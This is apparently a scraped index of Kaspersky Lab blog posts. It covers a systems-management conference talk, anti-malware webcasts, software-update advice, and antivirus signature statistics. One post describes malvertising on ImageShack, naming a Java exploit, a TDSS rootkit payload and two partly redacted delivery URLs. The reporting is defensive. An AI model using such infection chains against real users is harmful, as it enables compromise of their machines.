12 Nov LANDesk Interchange 2011, Poison Ivy, and US Incidents Kurt Baumgartner
15 Sep Lab Matters - The Evolution of Anti-Malware Protection Ryan Naraine
14 Jul Cloud Security vs Cybercrime Economy: The Kaspersky Vision Ryan Naraine
04 May Malvertising on ImageShack David Jacoby
15 Mar Webcast - The Good and Bad of Android Security Ryan Naraine
19 Jul Do you update? Roel
Join our blog
You can contribute to our blog if you have +100 points. Comment on articles and blogposts, and other users will rate your comments. You receive points for positive ratings.
LANDesk Interchange 2011 is winding down in Las Vegas today. The event gathered partners and displayed newer technologies offered by the decade old systems management company. It was interesting hearing from IT "old-timers" that have worked with the technology, describing the company's impact on the industry - its spinoff from Intel, the original LANDesk AV product that wound up in another vendor’s product, and what they like about Kaspersky Lab technologies integration into the security suite. We were happy to present at our partner's conference with "The Dark Side of Unmanaged Desktops", where I described 2011 incidents that both I and our Global Emergency Response Team have investigated and remediated, some incidents in the news, and some of the IT mismanagement issues that enabled these incidents to occur.
Kaspersky Lab chief technology officer Nikolay Grebennikov joins Ryan Naraine to discuss the evolution of anti-malware software. Grebennikov talks about the changing face of the malicious threat facing desktop users and the additional components added to Kaspersky's anti-malware products to move beyond signature-based detection of threats. He goes into detail about heuristics and emulation, behavior-based detection and newer proactive technologies to handle real-time malware detection.
In this webcast, Eugene Kaspersky, CEO and co-founder of Kaspersky Lab, shares his extensive knowledge of the driving forces that power the modern cyber-criminal ecosystem and discuss the way that cybercrime operates. He covers the latest developments in the security technologies and describes how he sees the security industry developing in the nearest future. Additionally, Eugene pays particular attention to showing how modern cloud security solutions not only protect users and businesses, but can seriously impede the cyber-criminals' black economy, thereby significantly reducing cyber-crime.
Today while conducting research on the alleged Latvian power hack, I came across some interesting malvertising on imageshack, where pictures of the purported hack have been hosted.
Advertising on the page loads a exploitable Java vulnerability that Kaspersky recognizes as Exploit.HTML.CVE.2010-4452.m, which then tries to download Trojan.win32.TDSS.cgir. TDSS as some of you may recognize is a rootkit that can access Windows at its lowest levels and can prove extremely difficult to remove.
Upon opening the page, the advertisement loads, and a connection to http://--removed--ediagroup.com/enc/jv.html is made. This launches the actual exploit. A second page http://--removed--ediagroup.com/load.php?2 is loaded which drops the Trojan containing the TDSS malware.
Kaspersky already detects both the exploit, as well as the Trojan payload. This serves as a reminder of the importance of keeping your Anti-virus up to date.
We will update with further details as they become available.
In this episode of Lab Matters, Kaspersky Lab malware researcher Tim Armstrong joins Ryan Naraine to examine the security posture of the Android mobile operating system. Armstrong looks at strengths and weaknesses of the open-source platform and warns about the risks associated with jailbreaking/rooting Android devices.
Most people I talk to claim that they are strong believers in updating. They update their operating system, applications that come with the operating system and security software almost religiously.
In turn most of these people are surprised when they hear that they should regularly check for updates to all the software they use. One example is some popular media players - some time ago, vulnerabilities were detected in them which allowed for remote code execution. And now of course we're seeing the same situation with Microsoft Office.
Over time we have also seen an increased focus on exploiting server-based software. Just think back to Net-Worm.Perl.Santy.a - it caused a major epidemic by exploiting a vulnerability in unpatched phpBB forums. More recently we’ve seen a large number of hackers targeting a vulnerability in IPB forum software. This resulted in a lot of sites being compromised and/ or defaced.
And right now we’re seeing extensive defacements on sites using outdated versions of Joomla and/ or Mambo.
It's clear if a site has been defaced. It won't be quite so obvious if a site has been compromised.
Although we’ve been telling people to update regularly for a long, long time, this latest case shows that we can’t say it too often. Once again: it's of the utmost importance you make sure that all of your software is up to date, both on your local machine and on any remote servers which you administer.
Once upon a time, back in the USSR, I accidentally got a virus on my computer, an Olivetti M24.
And I started my anti-virus career. That was in September (or October) 1989. And the first record was added to my first utility to fight computer viruses (well, in this case, just one computer virus). It was a challenge for me to analyze the code - and develop an anti-infection routine. I was so curious, and of course I didn't realize that it would become so serious.
Now there's an industry, now there are thousands of people developing anti-* solutions (including hundreds in my company). And just last night we had a major milestone - we added the 200,000th record to our antivirus databases. Cruel world...Two hundred thousand antivirus records! And the number will continue to increase - we're already up to 200,157 records.
A couple of worried users have contacted us to ask if KAV is going to drop detection for old boot/DOS viruses in the future, or for extinct Trojan downloaders.
At the moment, we've got no plans to do that. It could compromise detection and actually, given the way our engine works, dropping detection for DOS viruses would result in an insignifiant speed increase - less than 5% faster.
The risk of getting infected by Michaelangelo is probably pretty small nowadays, but it can't be entirely discounted. So rest assured, we'll keep on detecting those old boot and DOS viruses and the dead Trojan downloaders.
Like us, you might have seen a recent discussion about antivirus vendors response times.
Just like the vendors involved, we believe that speed of response to new threats and update frequency are vital.
That's why we provide hourly updates. Day in, day out, regardless of whether a particular threat makes headlines. This ensures that our users have access to effective protection against the 200+ new threats which appear ever day.
Even though our response times weren’t included in the discussion mentioned above, we consistently deliver a fast response. And that’s what’s most important.
It looks as though people have heard about our latest updates -1400 signatures and about 25 new unpackers added in one week - and are hurrying to get their hands on our software.
Here are some statistics so you can see how our updates have evolved:
|Year||Records added per day||Total records in database|
|1998||15||05.01 - 20172|
|1999||18||20.01 - 25733|
|2000||26||07.01 - 32572|
|2001||25||05.01 - 42233|
|2002||15||01.01 - 51495|
|2003||53||01.01 - 63082|
|2004||87||01.01 - 82515|
approx. 200 this week
|01.01 - 114506|
21.10 - 155372